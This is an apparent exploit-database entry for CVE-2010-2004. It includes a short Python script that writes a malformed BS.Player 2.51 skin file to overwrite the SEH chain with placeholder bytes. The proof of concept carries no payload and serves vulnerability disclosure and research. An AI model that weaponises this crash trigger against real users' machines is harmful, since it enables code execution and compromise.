BS.Player 2.51 - Overwrite (SEH)

Author: Mert SARICA
type: local
platform: windows
port: 
date_added: 2010-01-14  
date_updated:   
verified: 1  
codes: CVE-2010-2004;OSVDB-61803  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11146.py  

# BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com

junk = "[Options]\nSkin="

vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4

try:
   vulnerable = open("vulnerable.bsi",'w')
   vulnerable.write(vulnerability)
   vulnerable.close()
   print "Vulnerable file created!\n"
except:
   print "Error occured!"